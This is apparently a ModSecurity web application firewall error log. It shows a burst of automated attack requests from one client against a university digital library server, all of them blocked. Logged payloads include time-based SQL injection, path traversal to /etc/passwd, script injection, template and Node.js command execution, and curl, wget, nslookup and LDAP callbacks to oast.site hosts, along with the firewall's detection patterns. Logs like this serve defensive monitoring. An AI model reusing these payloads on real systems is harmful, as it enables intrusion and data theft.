[Tue Aug 29 11:31:44.355385 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAP@M2QAAAAZ"]
[Tue Aug 29 11:31:44.382197 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQMrvUAAAAu"]
[Tue Aug 29 11:31:45.457759 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAPiBk8AAAAB"]
[Tue Aug 29 11:31:45.479529 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgxss7rm1icfb7c.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQDFVMAAAAl"]
[Tue Aug 29 11:31:46.363147 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQDFVYAAAAl"]
[Tue Aug 29 11:31:47.412104 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAQkBYUAAAAC"]
[Tue Aug 29 11:31:47.447290 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQR47YAAAAz"]
[Tue Aug 29 11:31:49.313157 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAP5mLEAAAAM"]
[Tue Aug 29 11:31:49.375791 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAP@M3IAAAAZ"]
[Tue Aug 29 11:31:50.369953 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAP8G10AAAAV"]
[Tue Aug 29 11:31:50.426156 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAP8G18AAAAV"]
[Tue Aug 29 11:31:50.493734 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgdaffe4sakseuu.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg5t9qsw9gs89u1.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10tsCo-f0AAAP8G2AAAAAV"]
[Tue Aug 29 11:31:51.367708 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQnF5IAAAAF"]
[Tue Aug 29 11:31:51.428825 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgppi9157xjts4c.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgahfp16oc1dgus.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAQR48cAAAAz"]
[Tue Aug 29 11:31:51.474709 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAQR48kAAAAz"]
[Tue Aug 29 11:31:52.564351 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAP5mLsAAAAM"]
[Tue Aug 29 11:31:53.431324 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAPiBm4AAAAB"]
[Tue Aug 29 11:31:53.439022 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQQyoMAAAAy"]
[Tue Aug 29 11:31:54.327498 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10usCo-f0AAAQMrxUAAAAu"]
[Tue Aug 29 11:31:54.343263 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAQOv4QAAAAw"]
[Tue Aug 29 11:31:55.319354 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAP8G2YAAAAV"]
[Tue Aug 29 11:31:55.455536 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10u8Co-f0AAAPDn-oAAAAP"]
[Tue Aug 29 11:31:56.372043 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vMCo-f0AAAQNwKkAAAAv"]
[Tue Aug 29 11:31:56.393644 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgqcz3rzfhzqf6f.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAPiBnoAAAAB"]
[Tue Aug 29 11:31:57.313552 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vcCo-f0AAAQJWysAAAAr"]
[Tue Aug 29 11:31:57.460421 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vcCo-f0AAAQMryUAAAAu"]
[Tue Aug 29 11:31:58.398267 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAP6NRoAAAAQ"]
[Tue Aug 29 11:31:59.318925 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlgka944s96mragq.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAQSWPwAAAA0"]
[Tue Aug 29 11:32:04.352348 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQV4SgAAAA3"]
